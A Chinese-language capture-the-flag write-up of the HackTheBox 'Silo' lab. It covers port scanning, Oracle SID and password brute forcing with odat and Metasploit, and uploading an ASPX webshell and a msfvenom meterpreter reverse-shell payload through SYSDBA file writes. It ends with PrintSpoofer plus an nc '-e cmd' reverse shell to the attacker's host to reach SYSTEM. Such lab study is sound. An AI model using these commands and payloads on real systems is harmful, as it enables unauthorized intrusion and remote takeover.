Silo是HackTheBox上的Windows靶机,难度为Medium,是一个练习Oracle数据库和Windows提权的靶场。

靶场信息

靶场涉及到的一些技术:

  • Windows探测
  • Oracle数据库相关风险探测、漏洞利用
  • Windows提权

信息收集

对Windows靶机的信息收集,目前来看我理解主要来源于端口扫描、enum4linuxSMB文件共享。

端口扫描

uzi@kali ~/D/06_Wordlists> nmap -n --min-rate 2000 -T4 -p- --max-retries 10 -Pn -sC -sV 10.129.196.225
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 23:30 CST
Stats: 0:02:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.33% done; ETC: 23:33 (0:00:08 remaining)
Nmap scan report for 10.129.196.225
Host is up (0.23s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
|_clock-skew: mean: -3s, deviation: 0s, median: -4s
| smb2-time:
| date: 2023-06-02T15:33:11
|_ start_date: 2023-06-02T15:27:59
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.69 seconds

端口扫描信息可以看到靶机环境开放了80端口、1521端口和一些其他端口,分别对应WEB服务和Oracle数据库。
PS:49159端口看描述也对应于Oracle数据库,但是没拿到啥信息。

WEB路径扫描

WEB路径扫描没有有用信息。

[####################] - 6m    270027/270027  0s      found:46      errors:0
[####################] - 3m 30000/30000 192/s http://10.129.95.188/
[####################] - 3m 30000/30000 193/s http://10.129.95.188/aspnet_client/
[####################] - 3m 30000/30000 191/s http://10.129.95.188/Aspnet_client/
[####################] - 3m 30000/30000 187/s http://10.129.95.188/aspnet_Client/
[####################] - 3m 30000/30000 178/s http://10.129.95.188/aspnet_client/system_web/
[####################] - 3m 30000/30000 176/s http://10.129.95.188/ASPNET_CLIENT/
[####################] - 3m 30000/30000 177/s http://10.129.95.188/Aspnet_client/system_web/
[####################] - 3m 30000/30000 176/s http://10.129.95.188/aspnet_Client/system_web/
[####################] - 3m 30000/30000 181/s http://10.129.95.188/ASPNET_CLIENT/system_web/

enum4linux

enum4linux没有给出有用信息。

uzi@kali ~/D/0/feroxbuster> enum4linux 10.129.196.225
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jun 2 23:30:50 2023

=========================================( Target Information )=========================================

Target ........... 10.129.196.225
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


===========================( Enumerating Workgroup/Domain on 10.129.196.225 )===========================


[E] Can't find workgroup/domain



===============================( Nbtstat Information for 10.129.196.225 )===============================

Looking up status of 10.129.196.225
No reply from 10.129.196.225

==================================( Session Check on 10.129.196.225 )==================================


[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

SMB

SMB也没有不需要登录的共享文件夹。

uzi@kali ~/D/0/feroxbuster [1]> smbclient -L //10.129.196.225 -N
session setup failed: NT_STATUS_ACCESS_DENIED

Oracle数据库探测

Oracle数据库的探测、攻击参考了HackTricks上的教程,大概思路是:

  1. 猜解SID
  2. 猜解用户名、密码

猜解SID

使用auxiliary/scanner/oracle/sid_enum探测,未得到结果

msf6 > use auxiliary/scanner/oracle/sid_enum
msf6 auxiliary(scanner/oracle/sid_enum) > show options

Module options (auxiliary/scanner/oracle/sid_enum):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/oracle/sid_enum) > set rhosts 10.129.95.188
rhosts => 10.129.95.188
msf6 auxiliary(scanner/oracle/sid_enum) > run

[-] 10.129.95.188:1521 - TNS listener protected for 10.129.95.188...
[*] 10.129.95.188:1521 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

暴力破解SID,得到如下成功的SID:

msf6 auxiliary(scanner/oracle/sid_enum) > use auxiliary/scanner/oracle/sid_brute
msf6 auxiliary(scanner/oracle/sid_brute) > show options

Module options (auxiliary/scanner/oracle/sid_brute):

Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1521 yes The target port (TCP)
SID no A specific SID to attempt.
SID_FILE /usr/share/metasploit-framework/data/wordlists/sid.txt no File containing instance names, one per line
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
VERBOSE true yes Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/oracle/sid_brute) > set rhosts 10.129.95.188
rhosts => 10.129.95.188
msf6 auxiliary(scanner/oracle/sid_brute) > run
...
[+] 10.129.196.225:1521 - 10.129.196.225:1521 Oracle - 'XE' is valid
[+] 10.129.196.225:1521 - 10.129.196.225:1521 Oracle - 'PLSEXTPROC' is valid
[+] 10.129.196.225:1521 - 10.129.196.225:1521 Oracle - 'CLREXTPROC' is valid
[+] 10.129.196.225:1521 - 10.129.196.225:1521 Oracle - '' is valid

猜解用户名、密码

对Oracle数据库猜解用户名、密码时,建议使用用户名和密码一一对应的字典,可以减少请求次数。
我个人实际测试下来看,下面几种方式实际猜解效果都不好:

  • msf auxiliary/admin/oracle/oracle_login
  • msf auxiliary/scanner/oracle/oracle_login
  • nmap oracle-brute

使用odat进行口令爆破,实际也花了不少时间。

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py passwordguesser -s 10.129.95.188 -p 1521 -d XE

[1] (10.129.95.188:1521): Searching valid accounts on the 10.129.95.188 server, port 1521
The login cis has already been tested at least once. What do you want to do: | ETA: 00:21:01
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:21:39
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:20:50
[!] Notice: 'dip' account is locked, so skipping this username for password | ETA: 00:19:44
[!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:16:47
[!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:12:51
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password | ETA: 00:10:03
[!] Notice: 'outln' account is locked, so skipping this username for password | ETA: 00:09:01
[+] Valid credentials found: scott/tiger. Continue... | ETA: 00:04:59
[!] Notice: 'system' account is locked, so skipping this username for password | ETA: 00:03:59
[!] Notice: 'xdb' account is locked, so skipping this username for password######### | ETA: 00:00:59
100% |##################################################################################| Time: 00:24:45
[+] Accounts found on 10.129.95.188:1521/sid:XE:
scott/tiger

Oracle数据库连接注意点

HackTricks上的教程中包含了Oracle数据库命令执行相关操作,odat也有相应的功能。
我自己尝试时一直失败,后来查看这篇题解才发现使用odat时可以指定--sysdba参数,以SYSDBA权限连接

以SYSDBA权限连接(指定--sysdba参数),可以读取靶机hosts文件:

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --getFile "C://windows/system32/drivers/etc" hosts /tmp/hosts1

[1] (10.129.95.188:1521): Read the hosts file stored in C://windows/system32/drivers/etc on the 10.129.95.188 server
[+] Data stored in the hosts file sored in C://windows/system32/drivers/etc (copied in /tmp/hosts1 locally):
b"# Copyright (c) 1993-2009 Microsoft Corp.\n#\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n#\n# This file contains the mappings of IP addresses to host names. Each\n# entry should be kept on an individual line. The IP address should\n# be placed in the first column followed by the corresponding host name.\n# The IP address and the host name should be separated by at least one\n# space.\n#\n# Additionally, comments (such as these) may be inserted on individual\n# lines or following the machine name denoted by a '#' symbol.\n#\n# For example:\n#\n# 102.54.94.97 rhino.acme.com # source server\n# 38.25.63.10 x.acme.com # x client host\n\n# localhost name resolution is handled within DNS itself.\n#\t127.0.0.1 localhost\n#\t::1 localhost\n"

不指定--sysdba参数,读取靶机hosts文件提示权限不足:

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE  --getFile "C://windows/system32/drivers/etc" hosts /tmp/hosts1

[1] (10.129.95.188:1521): Read the hosts file stored in C://windows/system32/drivers/etc on the 10.129.95.188 server
[-] Impossible to read the ['C://windows/system32/drivers/etc', 'hosts', '/tmp/hosts1'] file: `ORA-01031: insufficient privileges`

初始权限

对于Windows服务器拿初始shell,按我原来打靶场的方式,一般来说时取得用户名和密码之后使用evil-winrm进行连接。
这个靶场的方式是,上传webshell到IIS文件目录,使用WEBshell进行。也可以生成meterpreter后门或者CS后门来上传、执行利用。

WEBshell

使用odat的文件处理模块上传WEBshell文件,通过浏览器利用。

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --putFile 'C:\Inetpub\wwwroot' a.aspx /usr/share/webshells/aspx/cmdasp.aspx --sysdba

[1] (10.129.95.188:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\Inetpub\wwwroot folder like a.aspx on the 10.129.95.188 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the a.aspx file

meterpreter

生成WEBshell:

msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows --arch x64 -e x64/xor -i 3  LHOST=10.10.14.29 LPORT=4444 -f exe -o a.exe

odat上传文件:

python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' a.exe /home/uzi/Documents/00-Learning/hackthebox/Machines/Silo/a.exe

msf监听:

msf6 auxiliary(admin/oracle/oracle_login) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > run

odat执行命令:

python ./odat.py externaltable -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --exec "C:/inetpub/wwwroot" "a.exe"

用户权限

WEBshell执行dir C:\Users\查看用户名是Phineas,可以直接查看user部分flag。

root权限

关于Windows的提权,可以参考HackTricks的Abusing Tokens
前面查看IIS的权限,发现有SeImpersonatePrivilege权限,可以直接提权,参考HackTricks的这篇文章

上传PrintSpoofernc

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' PrintSpoofer.exe /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe

[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe local file in the C:\Inetpub\wwwroot folder like PrintSpoofer.exe on the 10.129.95.188 server
[+] The /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the PrintSpoofer.exe file
(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' nc64.exe /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe

[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe local file in the C:\Inetpub\wwwroot folder like nc64.exe on the 10.129.95.188 server
[+] The /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the nc64.exe file

监听本地端口,在WEBshell里面执行命令提权:

WEBshell:
C:\inetpub\wwwroot\PrintSpoofer.exe -c "C:\inetpub\wwwroot\nc64.exe 10.10.14.29 9002 -e cmd"

本地监听端口:
uzi@kali ~/D/0/h/M/Silo> nc -lvnp 9002
Listening on 0.0.0.0 9002
Connection received on 10.129.95.188 49166
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

PS:本地监听端口时本来想用pwncat-cs,结果报错了,使用nc就没问题。
另,靶机环境提权部分给出了系统镜像,看题解是使用volatilitylsadump导出管理员账户登录密码信息。
另外题解也提到,因为oracle服务是SYSTEM权限运行的,所以可以直接使用odat查看root权限对应的flag文件。

总结

Silo靶场,我自己尝试攻击时猜解出密码,但没使用SYSDBA连接。
我从这个靶场里面学习到Oracle数据库利用相关知识,也深化了Windows提权的理解。